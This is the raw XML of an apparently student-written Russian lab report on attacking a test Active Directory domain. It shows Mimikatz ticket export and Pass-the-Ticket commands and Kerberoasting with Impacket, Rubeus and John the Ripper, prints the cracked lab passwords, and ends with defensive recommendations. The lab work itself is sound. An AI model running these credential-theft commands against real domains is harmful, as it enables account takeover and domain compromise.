        <w:t>Суть атаки: билеты Kerberos (TGT и сервисные билеты) кэшируются в памяти LSASS. Экспортировав билет и загрузив его в другой сеанс, атакующий получает все права владельца билета — пароль и хеш при этом не нужны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A7F88" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На ws01 в Mimikatz выполнена выгрузка всех доступных билетов Kerberos в файлы формата .kirbi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B4E0F" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sekurlsa::tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE847F" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Затем запущена новая командная строка (отдельный сеанс), в ней снова открыт Mimikatz и выполнена загрузка билета:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DB71B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kerberos::ptt [0;54e89]-2-0-40e10000-student@krbtgt-ACME.SKB.kirbi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D65EC7" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mimikatz ответил «File: ... OK» — билет успешно загружен в текущий сеанс. Проверка командой klist подтверждает наличие кэшированных билетов: два TGT (krbtgt/ACME.SKB) и сервисный билет cifs/dc01 для доступа к файловым ресурсам контроллера домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEB536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22D282" wp14:editId="37F2945A">
            <wp:extent cx="5715000" cy="3248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A5F2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8 — Успешная загрузка билета (kerberos::ptt → OK) и список билетов klist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CF9C7" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc239412382"/>
      <w:r>
        <w:t>5.4. Атака Kerberoasting (Impacket / Rubeus)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6A46F7FE" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Суть атаки: любой доменный пользователь может запросить у KDC сервисный билет (TGS) для учётной записи службы, у которой задан SPN. Билет зашифрован ключом, производным от пароля сервисной учётной записи, поэтому его можно взломать офлайн — перебором по словарю, не вызывая подозрений на контроллере домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4CE06" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>С машины kali выполнен поиск учётных записей с SPN скриптом GetUserSPNs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30809499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impacket-GetUserSPNs acme.skb/student -dc-ip 10.0.20.51 -request -outputfile ~/spn.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD171F2" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Найдена</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сервисная</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>учётная</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSSQLSvc </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SPN MSSQLSvc/dc01.acme.skb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D2BE1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0321357" wp14:editId="4C1CD7DB">
            <wp:extent cx="5715000" cy="3571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DD8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9 — GetUserSPNs: найдена сервисная учётная запись MSSQLSvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DACFC5" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Запрос сервисного билета также выполнен с рабочей станции ws01 утилитой Rubeus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F618C6A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.\Rubeus.exe kerberoast /outfile:C:\Users\student\Downloads\spn.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C547BCD" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Rubeus </w:t>
      </w:r>
      <w:r>
        <w:t>определил</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>одну</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kerberoastable-</w:t>
      </w:r>
      <w:r>
        <w:t>учётную</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MSSQLSvc, </w:t>
      </w:r>
      <w:r>
        <w:t>тип</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>шифрования</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RC4_HMAC) </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>записал</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>хеш</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>билета</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> spn.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E3147" w14:textId="77777777" w:rsidR="00A959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91D217" wp14:editId="3A35748D">
            <wp:extent cx="5715000" cy="2943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4769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10 — Rubeus: сервисный билет MSSQLSvc выгружен в spn.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA16016" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Полученный хеш (формат krb5tgs, etype 23) взломан в John the Ripper по словарю rockyou — пароль сервисной учётной записи подобран за 12 секунд:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFF6C6" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="340"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>john --wordlist=/usr/share/wordlists/rockyou.txt ~/spn.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDAC80B" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Пароль MSSQLSvc: Pa$$w0rds123!@#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20393E17" w14:textId="77777777" w:rsidR="00A959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C527E8" wp14:editId="3998AB39">
            <wp:extent cx="5715000" cy="2295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C801" w14:textId="77777777" w:rsidR="00A959D4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>Рисунок 11 — John the Ripper: пароль сервисной учётной записи подобран</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78AB6D" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc239412383"/>
      <w:r>
        <w:t>6. Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4F553F00" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе практической работы все цели достигнуты. Проведён анализ доменной инфраструктуры acme.skb с помощью SharpHound и BloodHound: </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>собраны данные о 104 объектах домена и построен граф членов группы «Администраторы домена». Успешно выполнены четыре атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145ECB01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Pass-the-Hash — получен доступ к ресурсу \\dc01\c$ по NTLM-хешу пользователя student без знания пароля;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E9D56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NTLM Relay — аутентификация student ретранслирована на контроллер домена, перехваченный NetNTLMv2-хеш взломан, пароль восстановлен ($tudent0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706BA05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Pass-the-Ticket — билеты Kerberos экспортированы из памяти и загружены в новый сеанс, что подтверждено выводом klist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B1A1F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Kerberoasting — найдена сервисная учётная запись MSSQLSvc, её сервисный билет выгружен и взломан офлайн, пароль восстановлен (Pa$$w0rds123!@#).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5FBF6" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Работа показывает, что компрометация одной рабочей станции и слабые пароли приводят к компрометации всего домена. Основные рекомендации по защите:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060115E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использовать длинные случайные пароли (или gMSA) для сервисных учётных записей — пароль MSSQLSvc взломан за секунды именно из-за словарной основы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70870682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включить обязательное подписывание SMB на всех серверах — это делает невозможной ретрансляцию NTLM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07118E62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минимизировать число членов группы «Администраторы домена» и не входить под ними на рядовых рабочих станциях, где хеши и билеты могут быть извлечены из памяти;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47900178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внедрить LAPS для локальных администраторов и механизм Credential Guard для защиты памяти LSASS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A953773" w14:textId="77777777" w:rsidR="00A959D4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отслеживать события запроса TGS с шифрованием RC4 (событие 4769) как индикатор Kerberoasting.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A959D4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7FC31" w14:textId="77777777" w:rsidR="005336A1" w:rsidRDefault="005336A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5B570F79" w14:textId="77777777" w:rsidR="005336A1" w:rsidRDefault="00533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67C19" w14:textId="77777777" w:rsidR="00A959D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3481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96D9F" w14:textId="77777777" w:rsidR="005336A1" w:rsidRDefault="005336A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="103D7E57" w14:textId="77777777" w:rsidR="005336A1" w:rsidRDefault="00533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827E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF2C02CA"/>
    <w:lvl w:ilvl="0" w:tplc="5C4C6132">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="42980E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BAE2EDB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="992A83C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BDFCEF26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="24F2B6C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="30DCEA7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6A3010F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="72DCBF84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1508134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D4"/>
    <w:rsid w:val="00234811"/>
    <w:rsid w:val="00443B6B"/>
    <w:rsid w:val="005336A1"/>
    <w:rsid w:val="00A9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D32DB"/>
  <w15:docId w15:val="{8DBF41D0-9EB8-4201-9748-69518364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after="80"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:ind w:left="3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1482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11.8</dc:title>
  <dc:creator>student</dc:creator>
  <cp:lastModifiedBy>Алексей Жарков</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-04T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-04T08:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>